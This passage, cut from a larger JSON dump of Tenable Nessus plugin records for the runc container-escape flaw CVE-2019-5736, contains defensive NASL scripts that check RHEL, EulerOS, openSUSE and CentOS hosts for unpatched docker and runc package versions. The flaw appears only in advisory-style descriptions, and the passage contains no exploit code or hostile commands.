value:\"p-cpe:/a:redhat:enterprise_linux:docker-novolume-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-rhel-push-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-unit-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-v1.10-migrator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:0408\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-1.12.6-79.git5680db5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-client-1.12.6-79.git5680db5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-common-1.12.6-79.git5680db5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-debuginfo-1.12.6-79.git5680db5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-logrotate-1.12.6-79.git5680db5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-lvm-plugin-1.12.6-79.git5680db5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-novolume-plugin-1.12.6-79.git5680db5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-rhel-push-plugin-1.12.6-79.git5680db5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-unit-test-1.12.6-79.git5680db5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-v1.10-migrator-1.12.6-79.git5680db5.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"docker / docker-client / docker-common / docker-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-11T08:54:59", "description": "According to the version of the docker-engine package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - A flaw was found in the way runc handled system file\n descriptors when running containers. A malicious\n container could use this flaw to overwrite contents of\n the runc binary and consequently run arbitrary commands\n on the container host system. (CVE-2019-5736)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-03-08T00:00:00", "title": "EulerOS 2.0 SP5 : docker-engine (EulerOS-SA-2019-1074)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2019-03-08T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:docker-engine", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-1074.NASL", "href": "https://www.tenable.com/plugins/nessus/122697", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(122697);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/10\");\n\n script_cve_id(\n \"CVE-2019-5736\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : docker-engine (EulerOS-SA-2019-1074)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the docker-engine package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - A flaw was found in the way runc handled system file\n descriptors when running containers. A malicious\n container could use this flaw to overwrite contents of\n the runc binary and consequently run arbitrary commands\n on the container host system. (CVE-2019-5736)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1074\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aaf104d5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected docker-engine package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:docker-engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"docker-engine-1.11.2.109-0.0.20190219.220020.git66790c0.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"docker-engine\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:45:01", "description": "This update for docker-runc fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2019-5736: Effectively copying /proc/self/exe during\n re-exec to avoid write attacks to the host runc binary,\n which could lead to a container breakout (bsc#1121967)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "edition": 17, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-02-19T00:00:00", "title": "openSUSE Security Update : docker-runc (openSUSE-2019-201)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:docker-runc-debugsource", "p-cpe:/a:novell:opensuse:docker-runc-debuginfo", "p-cpe:/a:novell:opensuse:docker-runc-kubic-debuginfo", "p-cpe:/a:novell:opensuse:docker-runc-kubic", "p-cpe:/a:novell:opensuse:docker-runc-test", "p-cpe:/a:novell:opensuse:docker-runc-kubic-test", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:docker-runc", "p-cpe:/a:novell:opensuse:docker-runc-kubic-debugsource"], "id": "OPENSUSE-2019-201.NASL", "href": "https://www.tenable.com/plugins/nessus/122301", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-201.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(122301);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2019-5736\");\n\n script_name(english:\"openSUSE Security Update : docker-runc (openSUSE-2019-201)\");\n script_summary(english:\"Check for the openSUSE-2019-201 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for docker-runc fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2019-5736: Effectively copying /proc/self/exe during\n re-exec to avoid write attacks to the host runc binary,\n which could lead to a container breakout (bsc#1121967)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121967\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected docker-runc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc-kubic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc-kubic-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc-kubic-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc-kubic-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"docker-runc-1.0.0rc5+gitr3562_69663f0bd4b6-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"docker-runc-debuginfo-1.0.0rc5+gitr3562_69663f0bd4b6-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"docker-runc-debugsource-1.0.0rc5+gitr3562_69663f0bd4b6-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"docker-runc-kubic-1.0.0rc5+gitr3562_69663f0bd4b6-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"docker-runc-kubic-debuginfo-1.0.0rc5+gitr3562_69663f0bd4b6-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"docker-runc-kubic-debugsource-1.0.0rc5+gitr3562_69663f0bd4b6-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"docker-runc-kubic-test-1.0.0rc5+gitr3562_69663f0bd4b6-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"docker-runc-test-1.0.0rc5+gitr3562_69663f0bd4b6-8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"docker-runc / docker-runc-debuginfo / docker-runc-debugsource / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T01:23:29", "description": "The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nCESA-2019:0975 advisory.\n\n - runc: Execution of malicious containers allows for container escape and access to host filesystem\n (CVE-2019-5736)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2021-01-29T00:00:00", "title": "CentOS 8 : container-tools:rhel8 (CESA-2019:0975)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2021-01-29T00:00:00", "cpe": ["p-cpe:/a:centos:centos:container-selinux", "p-cpe:/a:centos:centos:oci-umount", "p-cpe:/a:centos:centos:buildah", "p-cpe:/a:centos:centos:containers-common", "p-cpe:/a:centos:centos:podman-docker", "p-cpe:/a:centos:centos:skopeo", "cpe:/o:centos:centos:8", "p-cpe:/a:centos:centos:oci-systemd-hook", "p-cpe:/a:centos:centos:containernetworking-plugins", "p-cpe:/a:centos:centos:fuse-overlayfs", "p-cpe:/a:centos:centos:slirp4netns", "p-cpe:/a:centos:centos:podman", "p-cpe:/a:centos:centos:runc", "cpe:/a:centos:centos:8::appstream"], "id": "CENTOS8_RHSA-2019-0975.NASL", "href": "https://www.tenable.com/plugins/nessus/145642", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2019:0975. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145642);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/02\");\n\n script_cve_id(\"CVE-2019-5736\");\n script_bugtraq_id(106976);\n script_xref(name:\"RHSA\", value:\"2019:0975\");\n\n script_name(english:\"CentOS 8 : container-tools:rhel8 (CESA-2019:0975)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nCESA-2019:0975 advisory.\n\n - runc: Execution of malicious containers allows for container escape and access to host filesystem\n (CVE-2019-5736)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:0975\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5736\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:buildah\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:container-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:containernetworking-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:containers-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:fuse-overlayfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:oci-systemd-hook\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:oci-umount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:podman\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:podman-docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:runc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:skopeo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:slirp4netns\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\nmodule_ver = get_kb_item('Host/RedHat/appstream/container-tools');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module container-tools:rhel8');\nif ('rhel8' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module container-tools:' + module_ver);\n\nappstreams = {\n 'container-tools:rhel8': [\n {'reference':'buildah-1.5-3.gite94b4f9.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'buildah-1.5-3.gite94b4f9.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'container-selinux-2.94-1.git1e99f1d.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'container-selinux-2.94-1.git1e99f1d.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'containernetworking-plugins-0.7.4-3.git9ebe139.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'containernetworking-plugins-0.7.4-3.git9ebe139.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'containers-common-0.1.32-3.git1715c90.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'containers-common-0.1.32-3.git1715c90.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'fuse-overlayfs-0.3-2.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'fuse-overlayfs-0.3-2.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'oci-systemd-hook-0.1.15-2.git2d0b8a3.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'oci-systemd-hook-0.1.15-2.git2d0b8a3.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'oci-umount-2.3.4-2.git87f9237.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'oci-umount-2.3.4-2.git87f9237.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'podman-1.0.0-2.git921f98f.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'podman-1.0.0-2.git921f98f.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'podman-docker-1.0.0-2.git921f98f.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'podman-docker-1.0.0-2.git921f98f.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'runc-1.0.0-55.rc5.dev.git2abd837.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'runc-1.0.0-55.rc5.dev.git2abd837.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'skopeo-0.1.32-3.git1715c90.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'skopeo-0.1.32-3.git1715c90.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'slirp4netns-0.1-2.dev.gitc4e1bc5.module_el8.0.0', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'slirp4netns-0.1-2.dev.gitc4e1bc5.module_el8.0.0', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n};\n\nflag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n appstream = NULL;\n appstream_name = NULL;\n appstream_version = NULL;\n appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == 